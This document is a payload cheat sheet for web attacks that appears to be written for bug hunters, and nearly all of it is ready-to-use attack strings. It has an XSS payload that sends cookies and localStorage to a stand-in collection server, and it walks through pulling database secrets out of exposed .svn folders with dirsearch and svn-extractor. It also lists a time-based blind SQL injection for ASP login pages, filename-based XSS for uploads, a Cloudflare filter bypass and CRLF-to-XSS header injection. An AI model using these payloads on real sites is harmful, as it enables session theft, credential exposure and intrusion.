Prohibited Payloads

Add a return parameter (can also be used for open redirection):

https://xyz.com/?return=javascript://%250Alert(document.location=document.cookie)

https://xyz.com/?return=https://google.com

https://raw.githubusercontent.com/payloadbox/xss-payload-list/master/Intruder/xss-payload-list.txt

📌Here is an XSS payload that steals both cookies and local storage data 🤯

📌Payload <svg/onload='const url = https://yourserver/collect?cookie=${encodeURIComponent(document.cookie)}&localStorage=${encodeURIComponent(JSON.stringify(localStorage))}; fetch(url);'>"

🚨Discovering DB secrets in SVN repository🚨

  1. Run ./dirsearch.py -u target -e php,html,js,xml -x 500,403

  2. Found http://url.com/.svn/

  3. Clone & use SVN-Extractor

  4. Run ./svn-extractor.py --url http://url.com --match database.php

⚡ Result: the output contains the secret.

ASP blind SQL Injection in a Login page⚡️ 👉 (Blind-Boolean method)

✅ Payload: ';%20waitfor%20delay%20'0:0:6'%20--%20

Payload for adding a tag or skill:

<a/href=”j&#97v&#97script:&#97lert(document.cookie)”>ClickMe

XSS payload : <img src%3Dx onerror%3D"\u0061\u006C\u0065\u0072\u0074 (1)">

Bypass 403

Both %0d and %0a work.

CVE-2022-22978 - Spring Security Admin Bypass PoC

DOM XSS in AVG

#"><img src=x onerror=prompt(0);>

📌If you find a file upload function for an image, try introducing an image with XSS in the filename like so 👇

<img src=x onerror=alert('XSS')>.png
"><img src=x onerror=alert('XSS')>.png
">.svg <alert('xss')a.png

Tech 1:

/?xss=<svg/onload=eval('+URL)>#';alert(document.domain)

Cloudflare bypass

<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>

CRLF

// CRLF to xss
<domain>/%23%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a<svg/onload%3dalert%28document.domain%29>
